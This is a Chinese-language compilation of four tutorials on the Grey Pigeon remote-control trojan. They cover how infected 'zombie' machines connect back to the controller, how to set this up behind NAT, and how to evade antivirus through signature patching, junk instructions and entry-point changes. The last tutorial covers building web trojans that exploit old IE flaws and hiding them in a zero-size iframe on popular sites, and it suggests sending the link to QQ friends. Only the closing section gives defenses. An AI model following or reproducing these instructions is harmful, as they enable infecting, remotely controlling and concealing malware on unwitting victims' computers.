灰鸽子上线原理(流程图)(精选4篇)
篇1:灰鸽子上线原理(流程图)
摘要:灰鸽子控制机器是有流程的,如果判断被控制机器无法上线的原因必须了解上线的原理,清楚了上线经过哪些流程才能正确的判断问题在于哪里。...
流程图 如下
仅画原理图;(希望大家认真看这图)
主控端 ②----→ 鸽子
① ③
| |
| |
↓ ↓
IP通知 ←----④ 肉鸡
⑤----→
内网上线看下面:
┏━━━━━━━━━━━━━━━━━━┓ ┏━━┓
┃IP通知(存放IP的IP.txt文件或者域名) ┃ ←----------- ┃肉鸡┃
┗━━━━━━━━━━━━━━━━━━┛ 寻找主控端IP地址 ┗━━┛
| IP通知文件指向
| 你IP文件中的IP
| 或者你的域名所
↓ 解析*出来的IP。
┏━━━━━━━━━━━━━━━━━━┓
┃ 公网IP(一般为ICS主机或者路由之类)* ┃
┗━━━━━━━━━━━━━━━━━━┛ 而到了这一步就是问题所在的地方了
↓ ↓ ↓ ↓ 公网IP不知道要向哪台机器通知上线
┏━━━┓┏━━━┓┏━━━┓┏━━━┓ 这就是为什么没有独立公网IP的机器
┃工作站┃┃工作站┃┃工作站┃┃工作站┃
┗━━━┛┗━━━┛┗━━━┛┗━━━┛ 不能实现肉鸡自动上线的原因所在了
其中一台工作站就是你主控端所在机器
*⑴ICS即Internet连接共享(Internet Connection Sharing)的英文简称
现在我们来说一下通过映射为什么能解决这个问题,如图(含*号的在图后有说明):
┏ ━ ← ━ ← ━ ← ━ ← ━ ← ━ ← ━ ← ━ ← ━ ← ━┓
↓ ↑
┏━━━━━━━━━━━━━━━━━━┓ ① 肉鸡开机后会主动去连接 ┏━━┓
┃ 供映射的机器,A:8000 * ┃→┓ ┃肉鸡┃
┗━━━━━━━━━━━━━━━━━━┛ ┃ 配置中IP的8000端口 ┗━━┛
|↓
↓
┃ ② 通过映射把供映射机器中的8000
┏━━━━━━━━━━━━━━━━━━┓
┃ 公网IP(一般为ICS*主机或者路由之类) ┃ ↓ 端口映射到本机,从而实现肉鸡
┗━━━━━━━━━━━━━━━━━━┛
┃ 直接连接到本机的8000端口,从
↓ ↓ ↓ ↓
↓ 而达到肉鸡自动上线的目的,
┏━━━┓┏━━━┓┏━━━┓┏━━━┓
┃工作站┃┃工作站┃┃工作站┃┃工作站┃←┛
┗━━━┛┗━━━┛┗━━━┛┗━━━┛
假设最后一个工作站是你使用的机器↑
*⑵假设配置时IP通知的位置填写的IP地址为A,而8000是灰鸽子连接所使用的默认端口
你能看明白这个图鸽子上线可以说没问题了!!!
篇2:灰鸽子上线原理(流程图)
看到有人苦恼鸽子上线问题,特别是内网的朋友,内网真的很麻烦,我看过一些其他的教程录象说的并不详细,或多或少总是遗漏一些关键部分。
今天就写个详细教程来教教大家怎么样内网上线,保证你100%成功。
首先我们去www.3322.org 申请一个域名,申请完毕后,登入,点击管理域名。看左边选择动态域名,然后新建,名字就大家随便选择了。IP地址填写你公网的IP,其他随便。看公网IP应该不用说了吧。用一个显IP的QQ就可以看到。
然后下载3322的客户端www.3322.org/dyndnspage/setup.exe,就是CN99QDNS客户端,下载完后安装。在程序里打开CN99DQNS 选择管理帐号,依次输入域名、用户名、口令,点增加,这就可以了(以后每次开鸽子钱打开此客户端,然后更新一下你的域名。)
在F盘新建文件夹,名字为IPIP(名字随便写都可以 在哪个盘也无所谓)。
接着打开鸽子-工具-FTP服务器:主目录就选择刚才建立的文件夹 F:IPIP,服务端口21,用户名就用3322申请的,密码一样,欢迎词随便写。
在自动保存目录和端口信息和程序启动时自动开启FTP服务上打勾,然后开启服务,
再来看工具-WEB服务器,主目录同FTP一样 F:IPIP,端口写80。
在自动保存目录和端口信息和程序启动时自动开启WEB服务上打勾,然后开启服务。
我们是内网,比如说我的电脑内网IP是192.168.1.3,现在进入陆由器。以TP-LINK的为例,在转发规则/虚拟服务器这一栏里,服务端口:21,IP写你自己的IP:192.168.1.3,协议:ALL。然后启用,再开一个,端口为8000其他同上,关掉陆由器。
打开鸽子的服务器配置/自动上线设置。在IP同址HTTP访问地址、DNS解析域名或固定IP:这里填上在3322申请的域名 比如我申请的是aabb.3322.org,这里填上aabb.3322.org 就可以了。然后其他的就随便大家怎么填了,最后生成一个服务端。
打开鸽子自动上线:
FTP服务器填:aabb.3322.ORG,端口:21,用户名和密码就是3322申请的那个。
存放IP的文件,IP.TXT。
IP文件内容:这里很关键,因为我们是内网,所以我们要这样写:
比如说我现在的内网IP是192.168.1.3,外网是:218.16.75.85,这里就写成218.16.75.85:8000。千万不能写内网的IP,现在大家大部分都是动态的IP,所以外网IP变动一次这里就要重新设置。重新开启鸽子时也要重新填写一下XX.XX.XX.XX:8000。
最后,更新IP到FTP空间就可以了。
测试:可以在自己电脑上测试,有朋友帮你测试更好,保证你可以上线。
篇3:灰鸽子免杀原理
为了让我们的木马在各种杀毒软件的威胁下活的更久.
二.什么叫免杀和查杀
可分为二类:
1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果,
2.内存的免杀和查杀:判断的方法:
1.运行后,用杀毒软件的内存查杀功能.
2.用OD载入,用杀毒软件的内存查杀功能.
三.什么叫特征码
1.含意:能识别一个程序是一个病毒的一段不大于64字节的特征串.
2.为了减少误报率,一般杀毒软件会提取多段特征串,这时,我们往往改一处就可达到
免杀效果,当然有些杀毒软件要同时改几处才能免杀.(这些方法以后详细介绍)
3.下面用一个示意图来具体来了解一下特征码的具体概念
四.特征码的定位与原理
1.特征码的查找方法:文件中的特征码被我们填入的数据(比如0)替换了,那杀毒软
件就不会报警,以此确定特征码的位置
2.特征码定位器的工作原理:原文件中部分字节替换为0,然后生成新文件,再根据杀
毒软件来检测这些文件的结果判断特征码的位置
五.认识特征码定位与修改的工具
1.CCL(特征码定位器)
2.OOydbg (特征码的修改)
3.OC用于计算从文件地址到内存地址的小工具.
4.UltaEdit-32(十六进制编辑器,用于特征码的手工准确定位或修改)
六.特征码修改方法
特征码修改包括文件特征码修改和内存特征码修改,因为这二种特征码的修改方法
是通用的。所以就对目前流行的特征码修改方法作个总节。
方法一:直接修改特征码的十六进制法
1.修改方法:把特征码所对应的十六进制改成数字差1或差不多的十六进制.
2.适用范围:一定要精确定位特征码所对应的十六进制,修改后一定要测试一下能
否正常使用.
方法二:修改字符串大小写法
1.修改方法:把特征码所对应的内容是字符串的,只要把大小字互换一下就可以了.
2.适用范围:特征码所对应的内容必需是字符串,否则不能成功.
方法三:等价替换法
1.修改方法:把特征码所对应的汇编指令命令中替换成功能类拟的指令.
2.适用范围:特征码中必需有可以替换的汇编指令.比如JN,JNE 换成JMP等.
如果和我一样对汇编不懂的可以去查查8080汇编手册.
方法四:指令顺序调换法
1.修改方法:把具有特征码的代码顺序互换一下.
2.适用范围:具有一定的局限性,代码互换后要不能影响程序的正常执行
方法五:通用跳转法
1.修改方法:把特征码移到零区域(指代码的空隙处),然后一个JMP又跳回来执行.
2.适用范围:没有什么条件,是通用的改法,强烈建议大家要掌握这种改法.
七.木马免杀的综合修改方法
文件免杀方法:
1.加冷门壳
2.加花指令
3.改程序入口点
4.改木马文件特征码的5种常用方法
5.还有其它的几种免杀修改技巧
内存免杀方法:
修改内存特征码:
方法1>直接修改特征码的十六进制法
方法2>修改字符串大小写法
方法3>等价替换法
方法4>指令顺序调换法
方法5>通用跳转法
木马的免杀[学用CLL定位文件和内存特怔码]
1.首先我们来看下什么叫文件特征码.
一般我们可以这样认为,一个木马程序在不运行的情况下,用杀毒软件查杀,若报警为病毒,说明存在该查毒软件的文件特征码的,
2.特征码的二种定位方法.
手动定位和自动定位
3.文件特征码的定位技巧.
通常用手动确定大范围,用自动精确定位小范围.
下面分别用瑞星和卡巴为例,实例演示并结合手动定位和自动定位二种方法来准确定位文件特征码。要定位的对像以下载者为例。
用卡巴来定位文件特征码
⑴.手动定位:
1.打开CLL
2.选择设置中的 总体参数 ,,,,,选中文件特征码手动定位,,,,以及路径
3选中设置中的 手动参数,,,,,选择替换方式 选中,,,总共生成规定个数的文件,,,生成个数为1000
4选择文件中的 特征码检测,,文件特征码检测,,,打开程序(要定位特证码的程序)
5在弹出的PE窗口中 直接点确定 ,之后弹出的窗口在点确定
6然后等CLL生成完毕之后用杀毒软件进行查杀
7在CLL中选 操作,结果定位,选中刚刚用来存放检测结果的文件夹
8在CLL中选
文件免杀之加花指令法
一.花指令相关知识:
其实是一段垃圾代码,和一些乱跳转,但并不影响程序的正常运行。加了花指令后,使一些杀毒软件无法正确识别木马程序,从而达到免杀的效果。
二.加花指令使木马免杀制作过程详解:
第一步:配置一个不加壳的木马程序。
第二步:用OD载入这个木马程序,同时记下入口点的内存地址。
第三步:向下拉滚动条,找到零区域(也就是可以插入代码的都是0的空白地方)。并记下零区域的起始内存地址。
第四步:从这个零区域的起始地址开始一句一句的写入我们准备好的花指令代码。
第五步:花指令写完后,在花指令的结束位置加一句:JMP 刚才OD载入时的入口点内存地址。
第六步:保存修改结果后,最后用PEditor这款工具打开这个改过后的木马程序。在入口点处把原来的入口地址改成刚才记下的零区域的起始内存地址,并按应用更改。使更改生效。
三.加花指令免杀技术总节:
1.优点:通用性非常不错,一般一个木马程序加入花指令后,就可以躲大部分的杀毒软件,不像改特征码,只能躲过某一种杀毒软件。
2.缺点:这种方法还是不能过具有内存查杀的杀毒软件,比如瑞星内存查杀等。
3.以后将加花指令与改入口点,加壳,改特征码这几种方法结合起来混合使用效果将非常不错。
四.加花指令免杀要点:
由于 网站公布的花指令过不了一段时间就会被杀软辨认出来,所以需要你自己去搜集一些不常用的花指令,另外目前还有几款软件可以自动帮你加花,方便一些不熟悉的朋友,例如花指令添加器等。
篇4:灰鸽子上线原理(流程图)
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理
首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是 精心制作的,用户一旦访问了该网页就会中木马。为什么说是 精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载 放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
⒈自动下载程序
小提示:代码说明
a.代码中“src”的属性为程序的网络地址,本例中“go163go.vicp.net/1.exe
b.也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件, 可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。
把这段代码插入到网页源代码的…之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录,你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。
图1网页木马示例
小提示:灰鸽子木马
为什么一定要用灰鸽子木马呢?因为灰鸽子是反弹型木马,该木马能绕过天网等大多数防火墙的拦截,中马后,服务端即被控端能主动连接控制端(客户端),也就是说,一旦被控端连接到Internet,在控制端那里,被控端就会“自动上线”(如图2)。
图2灰鸽子控制短示例(汗!又一大毒枭:))
⒉自动运行程序
把这段代码插入到网页源代码的…之间,然后用IE打开该网页,你会发现,这段代码可以在没有打相关补丁的IE6中自动打开记事本。
这段代码使用了shell.application控件,该控件能使网页获得执行权限,替换代码中的“Notepad.exe”(记事本)程序,可以用它自动运行本地电脑上的任意程序。
通过以上的代码我们可以看出,利用IE的漏洞,也就是说在网页中插入适当的代码,IE完全可以自动下载和运行程序,不过,IE一旦打了相关补丁,这些代码就会失去作用。另外,这些代码要运行和下载程序,有些杀毒软件的网页监控会视它们为病毒,为了逃避追杀, 可能会使用一些工具对网页的源代码进行加密处理(如图3)。
图3加密后的网页代码
二、网页木马的基本用法
理解了网页木马攻击的原理,我们可以制作自己的网页木马,但这需要你根据IE漏洞写出利用代码。实际上,在网上有很多高手已写出了一些漏洞的利用代码,有的还把它写成了可视化的程序。在搜索引擎输入“网页木马生成器”进行搜索,你会发现,在网上有很多利用IE的各种漏洞编写的网页木马生成器,它们大都为可视化的程序,只要你有一个木马(该木马必须把它放置到网络上),利用这些生成器你就可以立即生成一个网页,该网页就是网页木马,只要他人打开这个网页,该网页就可以自动完成下载木马并运行(安装)木马的过程。
在我的电脑上我已下载了一个网页木马生成器,下面我们来看怎么生成网页木马并让他人中木马。
第一步:启动该网页木马生成器,如图4所示,在文本框中输入木马的网络地址,最后单击“生成”。
图4网页木马生成器
第二步:在网页木马生成器的安装文件夹会生成一个网页文件,该文件就是我们在上一步生成的网页木马。上传该文件到自己的Web服务器或免费主面空间。
现在好了,把上述网页在服务器上的地址(网址)通过QQ发给自己的好友,一旦他访问了该网页,该网页就会在他的电脑上自动下载并运行你放置在网络上的木马。
现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧!实际上,即使人人都不打开陌生人发来的网址,也仍然有一些人“飞蛾补灯,自寻死路”,因为若大的Internet,总会有一些人会有意或无意地访问这些网址,而且,有些网页木马,还挂在一些知名网站上(根据知名网站的访问量,你算算吧,每天有多少人中了木马!)。
小提示:你可能还没想到,看电影,在论坛查看或回复帖子也能中木马。实际上,网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上,这样,用户一旦观看电影、查看或预览邮件(主要是一些用电子邮件群发器发送的垃圾邮件)、参与帖子,打开电子书,用户就会中网页木马。
在下面我们只介绍 如何在知名网站上挂网页木马。下面来看这一段代码:iframesrc=”img.shangxueba.cn/jyimg/xncsw130424/width=“0”
小提示:“src”的属性“go163go.vicp.net/hk.htm
把这段代码插入到某门户网站首页源代码的…之间,从表面上看,插入后该门户的首页并没有什么变化,但是,所有访问了该门户网站首页的人都会中木马,为什么会这样呢?这是因为这段代码中标签把网页木马网页隐藏性地“包含”在了插入代码的网页当中,
也叫浮动帧标签,它可以把一个HTML网页嵌入到另一个网页里实现“画中画”的效果(如图5),被嵌入的网页可以控制宽、高以及边框大小和是否出现滚动条等。在上代代码中,因为把宽(width)、高(height)、边框(frameborder)都设置为了“0”,所以,上述代码插入到门户网站的首页后,网站的首页不会发生变化,但是,由于嵌入的网页实际上已经打开了,所以网页上的下载木马和运行木马的脚本还是会随着门户首页的打开而执行的。
图5iframe标签示例
也许有人会问,如何把上述代码插入到门户网站首页的源代码中?这个问题问得好,本人才疏学浅,确实无法进入他们的服务器修改网页,但是 如果发现了这些服务器上的漏洞且获得了webshell权限,那么修改他们的网页就跟在本地制作一个网页一样容易。
有人还问,拿到服务器的webshell权限容易吗?如果你对网络安全比较关注,你会发现,经常有这个网站被黑了,那个网站的主页被修改了的新闻爆出。
有人还问,门户的服务器几乎无漏洞可找,个人服务器的漏洞较多,你能进入吗?本人不是 ,中华人民共和国的法律规定,入侵和篡改他人服务器上的信息是违法行为,希望大家共同维护网络安全。
以前,在网上打开一些有名的网站时杀毒软件也会报警,现在你明白其中的道理了吧。有些人在这些网站发帖子骂娘,看了本文,希望在骂娘时你也能为那些垫背的站长想想。
三:网页木马的防范策略
网页木马的防范只靠杀毒软件和防火墙是远远不够的,因为一旦 使用了反弹端口的个人版木马(个人反汇编的一些杀毒软件无法识别的木马),那么杀毒软件和防火墙就无可奈何,所以,网页木马的防范要从它的原理入手,从根子上进行防范。
㈠即时安装安全补丁
网页木马都是利用IE漏洞进行传播的,我们拿冰狐浪子的网页木马(用“冰狐浪子网页木马生成器”制作的网页木马)来说吧,该网页能绕过IE的安全设置,当用户连接到该网页时,它能在普通用户不知情的情况下在后台下载一个木马并运行(安装)该木马。所以,经常到微软网站去下载并安装最新的安全补丁是防范网页木马比较有效的办法。
㈡改名或卸载(反注册)最不安全的ActiveXObject(IE插件)
在系统中有些ActiveXObject会运行EXE程序,比如本文中“自动运行程序”代码中的Shell.application控件,这些控件一旦在网页中获得了执行权限,那么它就会变为木马运行的“温床”,所以把这些控件改名或卸载能彻底防范利用这些控件的网页木马。但是ActiveXObject是为了应用而出现的,而不是为了攻击而出现的,所有的控件都有它的用处,所以在改名或卸载一个控件之前,你必须确认这个控件是你不需要的,或者即使卸载了也不关大体的。
⒈卸载(反注册)ActiveXObject
第一步:在“开始”菜单上单击“运行”,输入“CMD”命令打开命令提示符窗口。
第二步:在命令提示符下输入“regsvr32.exeshell32.dll/u/s”,然后回车就能将Shell.application控件卸载。
如果日后我们希望继续使用这个控件的话,可以在命令提示符窗口中输入“regsvr32.exeshell32.dll/i/s”命令将它们重新安装(注册)。在上述命令中:“regsvr32.exe”是注册或反注册OLE对象或控件的命令,[/u]是反注册参数,[/s]是寂静模式参数,[/I]为安装参数。
⒉改名ActiveXObject
需要说明的是,改名一个控件时,控件的名称和CLSID(ClassID)都要改,并且要改彻底了。下面仍以Shell.application为例来介绍方法。
第一步:打开注册表编辑器,查找“Shell.application”。用这个方法能找到两个注册表项:“{13709620-C279-11CE-A49E-444553540000}”和“Shell.application”。
第二步:把{13709620-C279-11CE-A49E-444553540000}改为{13709620-C279-11CE-A49E-444553540001},注意,不要和系统中的其它CLSID重复。
第三步:把“Shell.application”改名为“Shell.application_xxx”。以后用到这个控件的时候你使用这个名称就可以正常调用此控件了。
㈢提高IE的安全级别,禁用脚本和ActiveX控件
经笔者的测试,用冰狐浪子的“网页木马专业版生成器”生成的网页木马,只要调高IE的安全级别,或者禁用脚本,该网页木马就不起作用了。从木马的攻击原理我们可以看出,网页木马是利用IE脚本和ActiveX控件上的一些漏洞下载和运行木马的,只要我们禁用了脚本和ActiveX控件,就可以防止木马的下载和运行。
小提示:禁用脚本和ActiveX控件会使一些网页的功能和效果失去作用,所以是否禁用,你要根据自己对安全的需要来定。
第一步:在IE浏览器的菜单栏上选择“工具→Internet选项”打开“Internet选项”对话框。